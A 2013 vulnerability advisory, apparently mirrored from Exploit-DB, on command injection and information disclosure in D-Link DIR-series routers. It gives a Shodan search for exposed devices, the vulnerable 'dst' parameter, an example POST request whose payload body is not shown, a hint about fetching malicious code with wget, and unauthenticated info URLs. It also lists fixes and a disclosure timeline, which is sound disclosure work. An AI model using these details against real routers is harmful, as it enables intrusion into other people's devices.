D-Link – Multiple Vulnerabilities

  • 作者: m-1-k-3
    日期: 2013-04-08
  • 类别:
  • 来源:https://www.exploit-db.com/exploits/24926/
  • # Exploit Title: Multiple Vulnerabilities in Dlink devices
    # Date: 05.04.2013
    # Exploit Author: m-1-k-3
    # Vendor Homepage: http://www.dlink.de
    # Software Link: http://www.dlink.de/cs/Satellite?c=Product_C&childpagename=DLinkEurope-DE%2FDLProductCarouselSingle&cid=1197391383981&p=1197318958269&packedargs=ProductParentID%3D1197318677527%26category%3DQuickProductFinder%26locale%3D1195806663795%26term%3DDIR-645&pagename=DLinkEurope-DE%2FDLWrapper
    # Version: different devices and versions are affected
    Device Name: DIR-600 / DIR-300 revB / DIR-815 / DIR-645 / DIR-412 / DIR-456 / DIR-110
    Vendor: D-Link
    ============Vulnerable Firmware Releases: ============ 
    DIR-815 v1.03b02 (unauthenticated command injection)
    DIR-645 v1.02 (unauthenticated command injection)
    DIR-645 v1.03 (authenticated command injection)
    DIR-600 below v2.16b01 (with v2.16b01 D-Link also fixes different vulnerabilities reported in M1ADV2013-003)
    DIR-300 revB v2.13b01 (unauthenticated command injection)
    DIR-300 revB v2.14b01 (authenticated command injection)
    DIR-412 Ver 1.14WWB02 (unauthenticated command injection)
    DIR-456U Ver 1.00ONG (unauthenticated command injection)
    DIR-110 Ver 1.01 (unauthenticated command injection)
    Possible other versions and devices are also affected by this vulnerability.
    ============ Shodan Torks ============ 
    Shodan search: Server: Linux, HTTP/1.1, DIR
    	=> 9300 results
    ============ Vulnerability Overview: ============ 
    * OS Command Injection
    The vulnerability is caused by missing input validation in the dst parameter and missing session validation and can be exploited to inject and execute arbitrary shell commands.
    WARNING: You do not need to be authenticated to the device to insert and execute malicious commands.
    Hint: On different devices like the DIR-645 wget is preinstalled and you are able to upload and execute your malicious code.
    	=> Parameter: dst
    Example Exploit:
    POST /diagnostic.php HTTP/1.1
    Host: xxxx
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Proxy-Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Referer: http://xxxx/
    Content-Length: 41
    Cookie: uid=hfaiGzkB4z
    Pragma: no-cache
    Cache-Control: no-cache
    Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/05.04.2013%20-%20Dlink-DIR-645_msf-shell.txt.png
    * Information disclosure:
    Nice server banner to detect this type of devices easily:
    Server Banner: Server: Linux, HTTP/1.1, DIR-815
    Server Banner: Server: Linux, HTTP/1.1, DIR-645
    Server Banner: Server: Linux, HTTP/1.1, DIR-600
    Server Banner: Server: Linux, HTTP/1.1, DIR-300
    Server Banner: Server: Linux, HTTP/1.1, DIR-412
    Server Banner: Server: Linux, HTTP/1.1, DIR-456U
    Server Banner: Server: Linux, HTTP/1.1, DIR-110
    * Information Disclosure:
    Detailed device information including Model Name, Hardware Version, Linux Kernel, Firmware version, Language and MAC Addresses are available via the network.
    http://<IP>IP/DevInfo.txt or http://<IP>IP/version.txt (check the source of the site)
    Response to DevInfo.txt:
    Firmware External Version: V1.00
    Firmware Internal Version: a86b
    Model Name: DIR-815
    Hardware Version: 
    WLAN Domain: xxx
    Language: en
    Graphcal Authentication: Disable
    LAN MAC: xx
    WAN MAC: xx
    WLAN MAC: xx
    These details are available without authentication.
    ============ Solution ============
    DIR-645: Update to firmware v1.04b5
    DIR-600: Update to firmware v2.16B01
    DIR-300rev B: Update to firmware 2.14B01 fixes the authentication bypass but not the command injection vulnerability.
    Other devices: No known solution available.
    ============ Credits ============
    The vulnerability was discovered by Michael Messner
    Mail: devnull#at#s3cur1ty#dot#de
    Web: http://www.s3cur1ty.de/advisories
    Twitter: @s3cur1ty_de
    ============ Time Line: ============
    14.12.2012 - discovered vulnerability in first device
    14.12.2012 - contacted dlink via the webinterface http://www.dlink.com/us/en/home-solutions/contact-d-link
    20.12.2012 - contacted Heise Security with details and Heisec forwarded the details to D-Link
    21.12.2012 - D-link responded that they will check the findings
    11.01.2013 - requested status update
    25.01.2013 - requested status update and updated D-Link with the other vulnerable devices
    25.01.2013 - D-Link responded that this is a security problem from the user and/or browser and they will not provide a fix.
    07.02.2013 - after the DIR-600/300 drama D'Link contacted me and now they are talking with me ;)
    since 07.02.2013 - Good communication and firmware testing
    27.02.2013 - Roberto Paleari releases details about authentication bypass in DIR-645 - http://packetstormsecurity.com/files/120591/dlinkdir645-bypass.txt
    05.04.2013 - vendor releases firmware updates
    05.04.2013 - public release
    ===================== Advisory end =====================